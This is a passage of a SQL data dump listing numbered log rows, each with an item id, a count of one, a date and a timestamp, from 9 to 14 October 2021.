10:11:32'),(35712,1606,1,'2021-10-09','2021-10-09 10:51:53'),(35713,2769,1,'2021-10-09','2021-10-09 11:01:46'),(35714,3005,1,'2021-10-09','2021-10-09 11:13:40'),(35715,1596,1,'2021-10-09','2021-10-09 11:43:25'),(35716,2813,1,'2021-10-09','2021-10-09 12:11:35'),(35717,89,1,'2021-10-09','2021-10-09 13:21:24'),(35718,1598,1,'2021-10-09','2021-10-09 13:29:54'),(35719,2154,1,'2021-10-09','2021-10-09 13:33:16'),(35720,89,1,'2021-10-09','2021-10-09 13:33:45'),(35721,1598,1,'2021-10-09','2021-10-09 13:34:17'),(35722,2159,1,'2021-10-09','2021-10-09 14:21:01'),(35723,3781,1,'2021-10-09','2021-10-09 15:26:29'),(35724,4396,1,'2021-10-09','2021-10-09 15:29:18'),(35725,1586,1,'2021-10-09','2021-10-09 15:49:00'),(35726,3664,1,'2021-10-09','2021-10-09 15:51:16'),(35727,1604,1,'2021-10-09','2021-10-09 17:08:54'),(35728,1586,1,'2021-10-09','2021-10-09 17:20:57'),(35729,2609,1,'2021-10-09','2021-10-09 17:26:54'),(35730,2309,1,'2021-10-09','2021-10-09 18:15:00'),(35731,1774,1,'2021-10-09','2021-10-09 18:38:42'),(35732,2775,1,'2021-10-09','2021-10-09 19:37:27'),(35733,2159,1,'2021-10-09','2021-10-09 20:21:11'),(35734,2161,1,'2021-10-09','2021-10-09 21:14:43'),(35735,1590,1,'2021-10-09','2021-10-09 21:53:31'),(35736,72,1,'2021-10-09','2021-10-09 22:00:35'),(35737,1600,1,'2021-10-09','2021-10-09 22:02:32'),(35738,1872,1,'2021-10-09','2021-10-09 22:56:05'),(35739,3045,1,'2021-10-09','2021-10-09 23:41:02'),(35740,2159,1,'2021-10-09','2021-10-09 23:57:00'),(35741,1726,1,'2021-10-10','2021-10-10 00:27:01'),(35742,2150,1,'2021-10-10','2021-10-10 01:27:01'),(35743,2297,1,'2021-10-10','2021-10-10 01:57:08'),(35744,1596,1,'2021-10-10','2021-10-10 02:27:51'),(35745,2609,1,'2021-10-10','2021-10-10 02:55:20'),(35746,1586,1,'2021-10-10','2021-10-10 02:55:56'),(35747,4332,1,'2021-10-10','2021-10-10 03:18:25'),(35748,89,1,'2021-10-10','2021-10-10 03:40:03'),(35749,1586,1,'2021-10-10','2021-10-10 03:40:44'),(35750,2309,1,'2021-10-10','2021-10-10 03:40:56'),(35751,84,1,'2021-10-10','2021-10-10 03:42:19'),(35752,91,1,'2021-10-10','2021-10-10 03:43:10'),(35753,84,1,'2021-10-10','2021-10-10 03:44:05'),(35754,1586,1,'2021-10-10','2021-10-10 03:44:18'),(35755,89,1,'2021-10-10','2021-10-10 03:44:38'),(35756,1544,1,'2021-10-10','2021-10-10 03:45:05'),(35757,89,1,'2021-10-10','2021-10-10 03:45:55'),(35758,1582,1,'2021-10-10','2021-10-10 03:46:07'),(35759,89,1,'2021-10-10','2021-10-10 03:47:22'),(35760,1584,1,'2021-10-10','2021-10-10 03:47:32'),(35761,1588,1,'2021-10-10','2021-10-10 03:48:00'),(35762,89,1,'2021-10-10','2021-10-10 03:48:03'),(35763,1586,1,'2021-10-10','2021-10-10 03:48:18'),(35764,89,1,'2021-10-10','2021-10-10 03:49:09'),(35765,1588,1,'2021-10-10','2021-10-10 03:49:23'),(35766,89,1,'2021-10-10','2021-10-10 03:50:03'),(35767,3691,1,'2021-10-10','2021-10-10 04:03:26'),(35768,3486,1,'2021-10-10','2021-10-10 04:25:55'),(35769,2769,1,'2021-10-10','2021-10-10 04:47:42'),(35770,1602,1,'2021-10-10','2021-10-10 04:48:25'),(35771,80,1,'2021-10-10','2021-10-10 04:59:40'),(35772,2457,1,'2021-10-10','2021-10-10 05:33:25'),(35773,2159,1,'2021-10-10','2021-10-10 05:55:09'),(35774,3781,1,'2021-10-10','2021-10-10 06:20:04'),(35775,3664,1,'2021-10-10','2021-10-10 06:25:08'),(35776,2813,1,'2021-10-10','2021-10-10 06:47:55'),(35777,1600,1,'2021-10-10','2021-10-10 06:50:11'),(35778,1718,1,'2021-10-10','2021-10-10 06:57:50'),(35779,91,1,'2021-10-10','2021-10-10 07:12:44'),(35780,3664,1,'2021-10-10','2021-10-10 07:25:09'),(35781,3045,1,'2021-10-10','2021-10-10 07:35:15'),(35782,3691,1,'2021-10-10','2021-10-10 07:48:24'),(35783,486,1,'2021-10-10','2021-10-10 07:55:09'),(35784,3109,1,'2021-10-10','2021-10-10 08:07:42'),(35785,1739,1,'2021-10-10','2021-10-10 08:20:11'),(35786,2161,1,'2021-10-10','2021-10-10 09:06:28'),(35787,1590,1,'2021-10-10','2021-10-10 09:18:26'),(35788,2410,1,'2021-10-10','2021-10-10 09:18:31'),(35789,1872,1,'2021-10-10','2021-10-10 09:50:15'),(35790,2297,1,'2021-10-10','2021-10-10 11:08:33'),(35791,2309,1,'2021-10-10','2021-10-10 11:33:18'),(35792,484,1,'2021-10-10','2021-10-10 12:09:22'),(35793,1596,1,'2021-10-10','2021-10-10 12:19:39'),(35794,1588,1,'2021-10-10','2021-10-10 12:39:42'),(35795,3691,1,'2021-10-10','2021-10-10 12:51:00'),(35796,2769,1,'2021-10-10','2021-10-10 13:30:38'),(35797,2457,1,'2021-10-10','2021-10-10 13:36:07'),(35798,3034,1,'2021-10-10','2021-10-10 15:18:26'),(35799,2813,1,'2021-10-10','2021-10-10 16:31:20'),(35800,3438,1,'2021-10-10','2021-10-10 16:48:30'),(35801,3045,1,'2021-10-10','2021-10-10 16:57:51'),(35802,3673,1,'2021-10-10','2021-10-10 17:27:02'),(35803,1600,1,'2021-10-10','2021-10-10 17:42:13'),(35804,3034,1,'2021-10-10','2021-10-10 17:48:25'),(35805,1718,1,'2021-10-10','2021-10-10 17:52:09'),(35806,1588,1,'2021-10-10','2021-10-10 18:12:02'),(35807,2410,1,'2021-10-10','2021-10-10 18:22:13'),(35808,2159,1,'2021-10-10','2021-10-10 18:25:13'),(35809,4341,1,'2021-10-10','2021-10-10 18:52:37'),(35810,3030,1,'2021-10-10','2021-10-10 19:02:30'),(35811,3438,1,'2021-10-10','2021-10-10 19:18:39'),(35812,2801,1,'2021-10-10','2021-10-10 19:48:30'),(35813,1602,1,'2021-10-10','2021-10-10 20:36:11'),(35814,3245,1,'2021-10-10','2021-10-10 20:38:25'),(35815,1586,1,'2021-10-10','2021-10-10 21:19:06'),(35816,2159,1,'2021-10-10','2021-10-10 21:25:14'),(35817,2751,1,'2021-10-10','2021-10-10 22:03:28'),(35818,3030,1,'2021-10-10','2021-10-10 22:19:20'),(35819,3752,1,'2021-10-10','2021-10-10 22:43:27'),(35820,2457,1,'2021-10-10','2021-10-10 22:48:26'),(35821,3691,1,'2021-10-10','2021-10-10 23:33:26'),(35822,2769,1,'2021-10-11','2021-10-11 00:40:45'),(35823,4436,1,'2021-10-11','2021-10-11 01:03:26'),(35824,1588,1,'2021-10-11','2021-10-11 01:22:39'),(35825,1606,1,'2021-10-11','2021-10-11 02:31:46'),(35826,1600,1,'2021-10-11','2021-10-11 03:00:21'),(35827,3030,1,'2021-10-11','2021-10-11 03:46:26'),(35828,1602,1,'2021-10-11','2021-10-11 03:47:01'),(35829,1544,1,'2021-10-11','2021-10-11 03:48:06'),(35830,1586,1,'2021-10-11','2021-10-11 03:50:30'),(35831,3691,1,'2021-10-11','2021-10-11 03:53:26'),(35832,3267,1,'2021-10-11','2021-10-11 04:22:33'),(35833,1612,1,'2021-10-11','2021-10-11 04:38:29'),(35834,2801,1,'2021-10-11','2021-10-11 04:55:17'),(35835,1606,1,'2021-10-11','2021-10-11 05:03:03'),(35836,1588,1,'2021-10-11','2021-10-11 06:25:43'),(35837,1614,1,'2021-10-11','2021-10-11 06:29:45'),(35838,1747,1,'2021-10-11','2021-10-11 06:33:28'),(35839,2159,1,'2021-10-11','2021-10-11 06:56:20'),(35840,72,1,'2021-10-11','2021-10-11 07:03:09'),(35841,3486,1,'2021-10-11','2021-10-11 07:09:29'),(35842,1726,1,'2021-10-11','2021-10-11 07:26:21'),(35843,1588,1,'2021-10-11','2021-10-11 07:54:14'),(35844,1582,1,'2021-10-11','2021-10-11 08:03:45'),(35845,1602,1,'2021-10-11','2021-10-11 08:16:28'),(35846,3664,1,'2021-10-11','2021-10-11 08:26:30'),(35847,3752,1,'2021-10-11','2021-10-11 08:45:03'),(35848,1747,1,'2021-10-11','2021-10-11 08:48:26'),(35849,2751,1,'2021-10-11','2021-10-11 08:50:53'),(35850,2751,1,'2021-10-11','2021-10-11 08:53:01'),(35851,2751,1,'2021-10-11','2021-10-11 08:53:12'),(35852,2297,1,'2021-10-11','2021-10-11 09:01:00'),(35853,2769,1,'2021-10-11','2021-10-11 09:05:06'),(35854,1602,1,'2021-10-11','2021-10-11 09:34:32'),(35855,486,1,'2021-10-11','2021-10-11 09:56:37'),(35856,76,1,'2021-10-11','2021-10-11 10:00:31'),(35857,89,1,'2021-10-11','2021-10-11 10:00:44'),(35858,1588,1,'2021-10-11','2021-10-11 10:00:55'),(35859,89,1,'2021-10-11','2021-10-11 10:01:14'),(35860,1602,1,'2021-10-11','2021-10-11 10:08:52'),(35861,1602,1,'2021-10-11','2021-10-11 10:26:27'),(35862,3482,1,'2021-10-11','2021-10-11 10:38:38'),(35863,3030,1,'2021-10-11','2021-10-11 11:01:33'),(35864,1588,1,'2021-10-11','2021-10-11 11:06:41'),(35865,1544,1,'2021-10-11','2021-10-11 11:21:12'),(35866,1544,1,'2021-10-11','2021-10-11 11:29:51'),(35867,487,1,'2021-10-11','2021-10-11 12:18:34'),(35868,2297,1,'2021-10-11','2021-10-11 12:39:48'),(35869,2297,1,'2021-10-11','2021-10-11 12:39:58'),(35870,108,1,'2021-10-11','2021-10-11 12:40:29'),(35871,2609,1,'2021-10-11','2021-10-11 12:43:25'),(35872,2609,1,'2021-10-11','2021-10-11 12:46:30'),(35873,2503,1,'2021-10-11','2021-10-11 12:51:31'),(35874,1602,1,'2021-10-11','2021-10-11 12:58:10'),(35875,3030,1,'2021-10-11','2021-10-11 13:23:09'),(35876,76,1,'2021-10-11','2021-10-11 13:26:37'),(35877,1588,1,'2021-10-11','2021-10-11 13:42:46'),(35878,91,1,'2021-10-11','2021-10-11 13:44:24'),(35879,1544,1,'2021-10-11','2021-10-11 13:46:20'),(35880,3664,1,'2021-10-11','2021-10-11 14:26:43'),(35881,2297,1,'2021-10-11','2021-10-11 14:29:18'),(35882,1544,1,'2021-10-11','2021-10-11 15:42:07'),(35883,3030,1,'2021-10-11','2021-10-11 15:45:15'),(35884,3313,1,'2021-10-11','2021-10-11 16:35:36'),(35885,2159,1,'2021-10-11','2021-10-11 16:57:27'),(35886,570,1,'2021-10-11','2021-10-11 17:06:11'),(35887,2769,1,'2021-10-11','2021-10-11 17:19:59'),(35888,4444,1,'2021-10-11','2021-10-11 17:29:41'),(35889,2769,1,'2021-10-11','2021-10-11 17:35:52'),(35890,3313,1,'2021-10-11','2021-10-11 17:36:12'),(35891,2293,1,'2021-10-11','2021-10-11 17:43:19'),(35892,1606,1,'2021-10-11','2021-10-11 17:46:29'),(35893,1726,1,'2021-10-11','2021-10-11 17:55:16'),(35894,2503,1,'2021-10-11','2021-10-11 18:31:39'),(35895,3117,1,'2021-10-11','2021-10-11 19:57:29'),(35896,3482,1,'2021-10-11','2021-10-11 19:57:30'),(35897,1544,1,'2021-10-11','2021-10-11 20:31:40'),(35898,1544,1,'2021-10-11','2021-10-11 20:32:51'),(35899,1544,1,'2021-10-11','2021-10-11 21:20:55'),(35900,1588,1,'2021-10-11','2021-10-11 21:42:47'),(35901,3030,1,'2021-10-11','2021-10-11 21:54:14'),(35902,3030,1,'2021-10-11','2021-10-11 21:59:45'),(35903,1600,1,'2021-10-11','2021-10-11 22:05:13'),(35904,1588,1,'2021-10-11','2021-10-11 22:48:06'),(35905,3072,1,'2021-10-11','2021-10-11 23:28:29'),(35906,3030,1,'2021-10-11','2021-10-11 23:38:47'),(35907,3691,1,'2021-10-11','2021-10-11 23:39:58'),(35908,72,1,'2021-10-11','2021-10-11 23:49:33'),(35909,1594,1,'2021-10-12','2021-10-12 00:30:21'),(35910,2813,1,'2021-10-12','2021-10-12 00:41:07'),(35911,4341,1,'2021-10-12','2021-10-12 00:51:38'),(35912,2457,1,'2021-10-12','2021-10-12 00:53:38'),(35913,2457,1,'2021-10-12','2021-10-12 00:57:03'),(35914,1598,1,'2021-10-12','2021-10-12 01:06:16'),(35915,3030,1,'2021-10-12','2021-10-12 01:21:02'),(35916,2769,1,'2021-10-12','2021-10-12 02:11:37'),(35917,4238,1,'2021-10-12','2021-10-12 02:22:21'),(35918,2769,1,'2021-10-12','2021-10-12 02:25:24'),(35919,4238,1,'2021-10-12','2021-10-12 03:39:03'),(35920,3771,1,'2021-10-12','2021-10-12 05:13:51'),(35921,3771,1,'2021-10-12','2021-10-12 06:04:24'),(35922,470,1,'2021-10-12','2021-10-12 06:25:36'),(35923,1594,1,'2021-10-12','2021-10-12 06:41:37'),(35924,1718,1,'2021-10-12','2021-10-12 07:09:05'),(35925,1544,1,'2021-10-12','2021-10-12 07:25:43'),(35926,1544,1,'2021-10-12','2021-10-12 07:26:12'),(35927,3030,1,'2021-10-12','2021-10-12 07:38:45'),(35928,1606,1,'2021-10-12','2021-10-12 07:55:29'),(35929,1608,1,'2021-10-12','2021-10-12 08:03:40'),(35930,1588,1,'2021-10-12','2021-10-12 08:11:38'),(35931,3245,1,'2021-10-12','2021-10-12 08:20:43'),(35932,1544,1,'2021-10-12','2021-10-12 09:06:38'),(35933,1582,1,'2021-10-12','2021-10-12 09:26:26'),(35934,1588,1,'2021-10-12','2021-10-12 09:33:17'),(35935,1747,1,'2021-10-12','2021-10-12 09:55:38'),(35936,1747,1,'2021-10-12','2021-10-12 09:55:53'),(35937,474,1,'2021-10-12','2021-10-12 09:58:35'),(35938,2904,1,'2021-10-12','2021-10-12 10:51:40'),(35939,2904,1,'2021-10-12','2021-10-12 10:51:40'),(35940,2904,1,'2021-10-12','2021-10-12 10:51:51'),(35941,1598,1,'2021-10-12','2021-10-12 11:04:10'),(35942,2813,1,'2021-10-12','2021-10-12 11:05:24'),(35943,2704,1,'2021-10-12','2021-10-12 11:08:28'),(35944,91,1,'2021-10-12','2021-10-12 11:10:34'),(35945,4440,1,'2021-10-12','2021-10-12 11:11:12'),(35946,4341,1,'2021-10-12','2021-10-12 11:25:11'),(35947,469,1,'2021-10-12','2021-10-12 11:29:02'),(35948,91,1,'2021-10-12','2021-10-12 11:38:45'),(35949,3245,1,'2021-10-12','2021-10-12 11:45:20'),(35950,2769,1,'2021-10-12','2021-10-12 11:49:08'),(35951,2309,1,'2021-10-12','2021-10-12 11:49:09'),(35952,4436,1,'2021-10-12','2021-10-12 12:08:11'),(35953,4238,1,'2021-10-12','2021-10-12 12:55:29'),(35954,4238,1,'2021-10-12','2021-10-12 12:56:08'),(35955,1606,1,'2021-10-12','2021-10-12 12:58:37'),(35956,80,1,'2021-10-12','2021-10-12 13:03:31'),(35957,3058,1,'2021-10-12','2021-10-12 13:06:19'),(35958,68,1,'2021-10-12','2021-10-12 13:08:38'),(35959,2904,1,'2021-10-12','2021-10-12 13:15:51'),(35960,335,1,'2021-10-12','2021-10-12 13:16:05'),(35961,68,1,'2021-10-12','2021-10-12 13:16:19'),(35962,1596,1,'2021-10-12','2021-10-12 13:16:58'),(35963,76,1,'2021-10-12','2021-10-12 14:00:08'),(35964,3257,1,'2021-10-12','2021-10-12 14:00:08'),(35965,2309,1,'2021-10-12','2021-10-12 14:08:48'),(35966,3030,1,'2021-10-12','2021-10-12 14:42:59'),(35967,3030,1,'2021-10-12','2021-10-12 14:47:31'),(35968,3030,1,'2021-10-12','2021-10-12 15:00:40'),(35969,1604,1,'2021-10-12','2021-10-12 15:13:47'),(35970,80,1,'2021-10-12','2021-10-12 15:14:28'),(35971,2503,1,'2021-10-12','2021-10-12 15:37:31'),(35972,80,1,'2021-10-12','2021-10-12 15:41:10'),(35973,2503,1,'2021-10-12','2021-10-12 15:44:41'),(35974,2503,1,'2021-10-12','2021-10-12 15:46:37'),(35975,2309,1,'2021-10-12','2021-10-12 15:54:09'),(35976,72,1,'2021-10-12','2021-10-12 15:58:35'),(35977,1594,1,'2021-10-12','2021-10-12 16:10:43'),(35978,4335,1,'2021-10-12','2021-10-12 16:25:54'),(35979,108,1,'2021-10-12','2021-10-12 16:26:50'),(35980,76,1,'2021-10-12','2021-10-12 16:27:27'),(35981,68,1,'2021-10-12','2021-10-12 16:27:33'),(35982,4335,1,'2021-10-12','2021-10-12 16:28:02'),(35983,2457,1,'2021-10-12','2021-10-12 16:34:15'),(35984,3092,1,'2021-10-12','2021-10-12 16:46:28'),(35985,1608,1,'2021-10-12','2021-10-12 16:59:10'),(35986,1592,1,'2021-10-12','2021-10-12 17:20:02'),(35987,3271,1,'2021-10-12','2021-10-12 17:31:41'),(35988,3282,1,'2021-10-12','2021-10-12 17:44:09'),(35989,1594,1,'2021-10-12','2021-10-12 17:58:30'),(35990,1594,1,'2021-10-12','2021-10-12 17:58:31'),(35991,1598,1,'2021-10-12','2021-10-12 18:38:39'),(35992,1606,1,'2021-10-12','2021-10-12 19:00:06'),(35993,80,1,'2021-10-12','2021-10-12 19:38:21'),(35994,2457,1,'2021-10-12','2021-10-12 20:23:43'),(35995,3030,1,'2021-10-12','2021-10-12 20:46:46'),(35996,3030,1,'2021-10-12','2021-10-12 20:54:52'),(35997,3030,1,'2021-10-12','2021-10-12 20:58:32'),(35998,1602,1,'2021-10-12','2021-10-12 21:30:35'),(35999,3030,1,'2021-10-12','2021-10-12 22:42:42'),(36000,1718,1,'2021-10-12','2021-10-12 22:48:07'),(36001,72,1,'2021-10-12','2021-10-12 23:35:44'),(36002,3285,1,'2021-10-13','2021-10-13 00:21:54'),(36003,3030,1,'2021-10-13','2021-10-13 01:40:36'),(36004,1594,1,'2021-10-13','2021-10-13 01:53:53'),(36005,1608,1,'2021-10-13','2021-10-13 01:54:06'),(36006,1695,1,'2021-10-13','2021-10-13 02:39:05'),(36007,1602,1,'2021-10-13','2021-10-13 02:40:05'),(36008,3282,1,'2021-10-13','2021-10-13 03:23:29'),(36009,2309,1,'2021-10-13','2021-10-13 04:04:26'),(36010,2704,1,'2021-10-13','2021-10-13 04:29:49'),(36011,2704,1,'2021-10-13','2021-10-13 05:47:47'),(36012,1734,1,'2021-10-13','2021-10-13 05:54:44'),(36013,89,1,'2021-10-13','2021-10-13 06:07:30'),(36014,469,1,'2021-10-13','2021-10-13 06:29:21'),(36015,3251,1,'2021-10-13','2021-10-13 06:34:47'),(36016,2704,1,'2021-10-13','2021-10-13 06:43:38'),(36017,1734,1,'2021-10-13','2021-10-13 07:01:38'),(36018,3486,1,'2021-10-13','2021-10-13 07:22:20'),(36019,3710,1,'2021-10-13','2021-10-13 08:03:09'),(36020,1592,1,'2021-10-13','2021-10-13 08:20:48'),(36021,72,1,'2021-10-13','2021-10-13 08:27:36'),(36022,2989,1,'2021-10-13','2021-10-13 08:41:23'),(36023,2989,1,'2021-10-13','2021-10-13 09:04:43'),(36024,1544,1,'2021-10-13','2021-10-13 09:08:21'),(36025,2159,1,'2021-10-13','2021-10-13 09:13:02'),(36026,2159,1,'2021-10-13','2021-10-13 09:13:06'),(36027,2159,1,'2021-10-13','2021-10-13 09:14:55'),(36028,3764,1,'2021-10-13','2021-10-13 09:26:03'),(36029,3764,1,'2021-10-13','2021-10-13 09:28:42'),(36030,1600,1,'2021-10-13','2021-10-13 10:43:44'),(36031,1600,1,'2021-10-13','2021-10-13 10:47:09'),(36032,1586,1,'2021-10-13','2021-10-13 10:57:18'),(36033,3030,1,'2021-10-13','2021-10-13 11:00:04'),(36034,3034,1,'2021-10-13','2021-10-13 11:01:52'),(36035,3030,1,'2021-10-13','2021-10-13 11:02:54'),(36036,1602,1,'2021-10-13','2021-10-13 11:23:14'),(36037,1877,1,'2021-10-13','2021-10-13 11:27:10'),(36038,3030,1,'2021-10-13','2021-10-13 11:37:04'),(36039,3030,1,'2021-10-13','2021-10-13 11:37:07'),(36040,76,1,'2021-10-13','2021-10-13 11:51:20'),(36041,68,1,'2021-10-13','2021-10-13 11:51:28'),(36042,3030,1,'2021-10-13','2021-10-13 12:02:07'),(36043,3087,1,'2021-10-13','2021-10-13 12:09:18'),(36044,3030,1,'2021-10-13','2021-10-13 12:19:00'),(36045,3030,1,'2021-10-13','2021-10-13 12:19:01'),(36046,2904,1,'2021-10-13','2021-10-13 12:20:36'),(36047,2904,1,'2021-10-13','2021-10-13 12:20:44'),(36048,102,1,'2021-10-13','2021-10-13 12:21:21'),(36049,2904,1,'2021-10-13','2021-10-13 12:25:05'),(36050,1606,1,'2021-10-13','2021-10-13 12:41:19'),(36051,1588,1,'2021-10-13','2021-10-13 12:47:59'),(36052,4238,1,'2021-10-13','2021-10-13 12:49:49'),(36053,3030,1,'2021-10-13','2021-10-13 13:10:18'),(36054,2309,1,'2021-10-13','2021-10-13 13:33:14'),(36055,80,1,'2021-10-13','2021-10-13 13:40:35'),(36056,4341,1,'2021-10-13','2021-10-13 13:52:10'),(36057,2503,1,'2021-10-13','2021-10-13 14:06:50'),(36058,3030,1,'2021-10-13','2021-10-13 14:22:53'),(36059,2309,1,'2021-10-13','2021-10-13 16:00:06'),(36060,1592,1,'2021-10-13','2021-10-13 16:09:07'),(36061,72,1,'2021-10-13','2021-10-13 16:17:41'),(36062,469,1,'2021-10-13','2021-10-13 16:18:36'),(36063,3030,1,'2021-10-13','2021-10-13 16:19:48'),(36064,1544,1,'2021-10-13','2021-10-13 16:24:39'),(36065,1608,1,'2021-10-13','2021-10-13 16:32:35'),(36066,1586,1,'2021-10-13','2021-10-13 16:33:42'),(36067,1586,1,'2021-10-13','2021-10-13 16:33:43'),(36068,469,1,'2021-10-13','2021-10-13 16:55:57'),(36069,1718,1,'2021-10-13','2021-10-13 16:59:39'),(36070,2704,1,'2021-10-13','2021-10-13 17:02:53'),(36071,469,1,'2021-10-13','2021-10-13 17:07:50'),(36072,3030,1,'2021-10-13','2021-10-13 17:14:18'),(36073,2309,1,'2021-10-13','2021-10-13 17:16:54'),(36074,2309,1,'2021-10-13','2021-10-13 17:19:10'),(36075,2609,1,'2021-10-13','2021-10-13 17:28:02'),(36076,472,1,'2021-10-13','2021-10-13 17:30:16'),(36077,1606,1,'2021-10-13','2021-10-13 17:32:02'),(36078,1582,1,'2021-10-13','2021-10-13 17:48:02'),(36079,1594,1,'2021-10-13','2021-10-13 18:13:18'),(36080,3245,1,'2021-10-13','2021-10-13 18:26:03'),(36081,2309,1,'2021-10-13','2021-10-13 19:14:34'),(36082,1602,1,'2021-10-13','2021-10-13 19:31:18'),(36083,3764,1,'2021-10-13','2021-10-13 19:56:23'),(36084,3058,1,'2021-10-13','2021-10-13 19:56:27'),(36085,4238,1,'2021-10-13','2021-10-13 19:57:58'),(36086,76,1,'2021-10-13','2021-10-13 20:01:43'),(36087,3781,1,'2021-10-13','2021-10-13 20:28:52'),(36088,4238,1,'2021-10-13','2021-10-13 20:46:08'),(36089,3181,1,'2021-10-13','2021-10-13 20:47:56'),(36090,1877,1,'2021-10-13','2021-10-13 21:13:12'),(36091,1877,1,'2021-10-13','2021-10-13 21:22:13'),(36092,1870,1,'2021-10-13','2021-10-13 21:29:40'),(36093,76,1,'2021-10-13','2021-10-13 21:30:58'),(36094,335,1,'2021-10-13','2021-10-13 21:39:42'),(36095,335,1,'2021-10-13','2021-10-13 22:02:31'),(36096,3781,1,'2021-10-13','2021-10-13 23:14:27'),(36097,72,1,'2021-10-13','2021-10-13 23:31:48'),(36098,1582,1,'2021-10-14','2021-10-14 00:38:39'),(36099,3251,1,'2021-10-14','2021-10-14 02:20:13'),(36100,1594,1,'2021-10-14','2021-10-14 02:35:14'),(36101,1544,1,'2021-10-14','2021-10-14 02:45:08'),(36102,1598,1,'2021-10-14','2021-10-14 02:56:28'),(36103,91,1,'2021-10-14','2021-10-14 03:00:20'),(36104,1606,1,'2021-10-14','2021-10-14 03:05:10'),(36105,1544,1,'2021-10-14','2021-10-14 03:24:55'),(36106,2704,1,'2021-10-14','2021-10-14 03:57:11'),(36107,2309,1,'2021-10-14','2021-10-14 04:11:55'),(36108,2769,1,'2021-10-14','2021-10-14 04:38:19'),(36109,3307,1,'2021-10-14','2021-10-14 04:38:25'),(36110,472,1,'2021-10-14','2021-10-14 04:57:13'),(36111,2309,1,'2021-10-14','2021-10-14 05:21:34'),(36112,2309,1,'2021-10-14','2021-10-14 05:30:48'),(36113,2309,1,'2021-10-14','2021-10-14 05:32:23'),(36114,3764,1,'2021-10-14','2021-10-14 05:57:07'),(36115,469,1,'2021-10-14','2021-10-14 06:04:12'),(36116,2813,1,'2021-10-14','2021-10-14 06:07:10'),(36117,2309,1,'2021-10-14','2021-10-14 06:37:25'),(36118,1608,1,'2021-10-14','2021-10-14 06:46:30'),(36119,3307,1,'2021-10-14','2021-10-14 06:49:09'),(36120,3097,1,'2021-10-14','2021-10-14 07:22:32'),(36121,80,1,'2021-10-14','2021-10-14 07:26:02'),(36122,2609,1,'2021-10-14','2021-10-14 08:06:02'),(36123,2609,1,'2021-10-14','2021-10-14 08:06:50'),(36124,3030,1,'2021-10-14','2021-10-14 08:54:30'),(36125,4238,1,'2021-10-14','2021-10-14 09:07:40'),(36126,2989,1,'2021-10-14','2021-10-14 09:17:44'),(36127,1602,1,'2021-10-14','2021-10-14 09:54:38'),(36128,2989,1,'2021-10-14','2021-10-14 10:06:22'),(36129,2989,1,'2021-10-14','2021-10-14 10:06:32'),(36130,2309,1,'2021-10-14','2021-10-14 10:44:23'),(36131,468,1,'2021-10-14','2021-10-14 10:47:52'),(36132,3030,1,'2021-10-14','2021-10-14 11:01:11'),(36133,3030,1,'2021-10-14','2021-10-14 11:02:17'),(36134,1594,1,'2021-10-14','2021-10-14 11:32:53'),(36135,2309,1,'2021-10-14','2021-10-14 11:48:04'),(36136,1592,1,'2021-10-14','2021-10-14 11:49:41'),(36137,3004,1,'2021-10-14','2021-10-14 11:50:49'),(36138,1728,1,'2021-10-14','2021-10-14 11:54:07'),(36139,3107,1,'2021-10-14','2021-10-14 11:58:09'),(36140,3107,1,'2021-10-14','2021-10-14 11:59:00'),(36141,3030,1,'2021-10-14','2021-10-14 12:15:05'),(36142,80,1,'2021-10-14','2021-10-14 12:28:44'),(36143,80,1,'2021-10-14','2021-10-14 12:29:59'),(36144,1596,1,'2021-10-14','2021-10-14 12:41:44'),(36145,3030,1,'2021-10-14','2021-10-14 12:52:56'),(36146,2769,1,'2021-10-14','2021-10-14 13:01:40'),(36147,1544,1,'2021-10-14','2021-10-14 13:29:59'),(36148,3030,1,'2021-10-14','2021-10-14 13:31:39'),(36149,3030,1,'2021-10-14','2021-10-14 13:31:51'),(36150,3030,1,'2021-10-14','2021-10-14 13:32:11'),(36151,1602,1,'2021-10-14','2021-10-14 13:48:52'),(36152,3030,1,'2021-10-14','2021-10-14 13:50:14'),(36153,2704,1,'2021-10-14','2021-10-14 14:03:08'),(36154,1544,1,'2021-10-14','2021-10-14 14:08:06'),(36155,1602,1,'2021-10-14','2021-10-14 14:08:10'),(36156,1602,1,'2021-10-14','2021-10-14 14:08:11'),(36157,3030,1,'2021-10-14','2021-10-14 14:22:01'),(36158,3030,1,'2021-10-14','2021-10-14 14:22:23'),(36159,3030,1,'2021-10-14','2021-10-14 14:28:18'),(36160,4400,1,'2021-10-14','2021-10-14 14:45:22'),(36161,1602,1,'2021-10-14','2021-10-14 14:52:34'),(36162,72,1,'2021-10-14','2021-10-14 15:11:38'),(36163,2769,1,'2021-10-14','2021-10-14 15:32:36'),(36164,80,1,'2021-10-14','2021-10-14 15:38:45'),(36165,1594,1,'2021-10-14','2021-10-14 15:38:49'),(36166,1602,1,'2021-10-14','2021-10-14 15:57:32'),(36167,1602,1,'2021-10-14','2021-10-14 15:57:58'),(36168,3030,1,'2021-10-14','2021-10-14 16:30:43'),(36169,80,1,'2021-10-14','2021-10-14 16:31:22'),(36170,3030,1,'2021-10-14','2021-10-14 16:31:37'),(36171,1718,1,'2021-10-14','2021-10-14 16:35:35'),(36172,3030,1,'2021-10-14','2021-10-14 16:48:25'),(36173,3030,1,'2021-10-14','2021-10-14 16:48:28'),(36174,3030,1,'2021-10-14','2021-10-14 16:55:27'),(36175,1604,1,'2021-10-14','2021-10-14 17:03:11'),(36176,1604,1,'2021-10-14','2021-10-14 17:20:13'),(36177,478,1,'2021-10-14','2021-10-14 17:26:48'),(36178,472,1,'2021-10-14','2021-10-14 17:34:46'),(36179,2813,1,'2021-10-14','2021-10-14 17:34:48'),(36180,472,1,'2021-10-14','2021-10-14 17:35:02'),(36181,472,1,'2021-10-14','2021-10-14 18:02:45'),(36182,2309,1,'2021-10-14','2021-10-14 18:12:44'),(36183,2503,1,'2021-10-14','2021-10-14 18:43:15'),(36184,1582,1,'2021-10-14','2021-10-14 18:46:00'),(36185,1588,1,'2021-10-14','2021-10-14 18:53:49'),(36186,1588,1,'2021-10-14','2021-10-14 18:54:29'),(36187,1598,1,'2021-10-14','2021-10-14 19:31:27'),(36188,3030,1,'2021-10-14','2021-10-14 19:49:23'),(36189,3030,1,'2021-10-14','2021-10-14 20:09:12'),(36190,2410,1,'2021-10-14','2021-10-14 20:35:27'),(36191,1600,1,'2021-10-14','2021-10-14 20:53:01'),(36192,3030,1,'2021-10-14','2021-10-14 21:08:58'),(36193,2309,1,'2021-10-14','2021-10-14 22:03:07'),(36194,2159,1,'2021-10-14','2021-10-14 22:16:14'),(36195,1602,1,'2021-10-14','2021-10-14 23:14:50'),(36196,1718,1,'2021-10-14','2021-10-14 23:25:49'),(36197,72,1,'2021-10-14','2021-10-14 